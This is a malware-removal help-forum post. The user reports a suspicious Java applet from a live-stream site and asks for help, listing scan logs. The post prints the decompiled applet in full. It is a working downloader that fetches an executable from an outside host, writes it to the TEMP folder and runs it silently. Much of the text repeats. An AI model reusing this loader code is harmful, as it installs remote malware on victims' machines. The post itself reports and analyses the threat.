1.My issues are:
I downloaded it nothing has happened as of yet and from the java live stream
http://livestream-vids.com/1itemdbow
It makes you use a java file which i decompiled
Pritty sure that is a virus
URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
Especially when i went on ripaustin.org and it had a register thing to make an account and it was a bot panel
2.My MBAM log:
3.My OTL log:
OTL
http://tinypaste.com/c45dad
EXTRAS
http://tinypaste.com/c1d33e
4.My GMER log:
http://tinypaste.com/e5403a
Issues encountered:
NONE YET!
I downloaded it nothing has happened as of yet and from the java live stream
http://livestream-vids.com/1itemdbow
It makes you use a java file which i decompiled
Code:
import java.applet.Applet;
import java.io.BufferedInputStream;
import java.io.BufferedOutputStream;
import java.io.FileOutputStream;
import java.net.URL;
public class Livestream extends Applet
{
public static void startupAll()
{
try
{
String str1 = System.getenv("TMP");
String str2 = "\\privzate.exe";
String str3 = str1.concat(str2);
URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
BufferedInputStream localBufferedInputStream = new BufferedInputStream(localURL.openStream());
FileOutputStream localFileOutputStream = new FileOutputStream(str3);
BufferedOutputStream localBufferedOutputStream = new BufferedOutputStream(localFileOutputStream, 1024);
byte[] arrayOfByte = new byte[1024];
int i = 0;
while ((i = localBufferedInputStream.read(arrayOfByte, 0, 1024)) >= 0) {
localBufferedOutputStream.write(arrayOfByte, 0, i);
}
localBufferedOutputStream.close(); localBufferedInputStream.close();
Runtime localRuntime = Runtime.getRuntime();
Process localProcess = localRuntime.exec(str3); } catch (Exception localException) {
}
}
public void init() {
startupAll();
}
public void main(String[] paramArrayOfString) {
startupAll();
}
}
Pritty sure that is a virus
URL localURL = new URL("http://gaytz.ripaustin.org/xex/local.exe");
Especially when i went on ripaustin.org and it had a register thing to make an account and it was a bot panel
2.My MBAM log:
3.My OTL log:
OTL
http://tinypaste.com/c45dad
EXTRAS
http://tinypaste.com/c1d33e
4.My GMER log:
http://tinypaste.com/e5403a
Issues encountered:
NONE YET!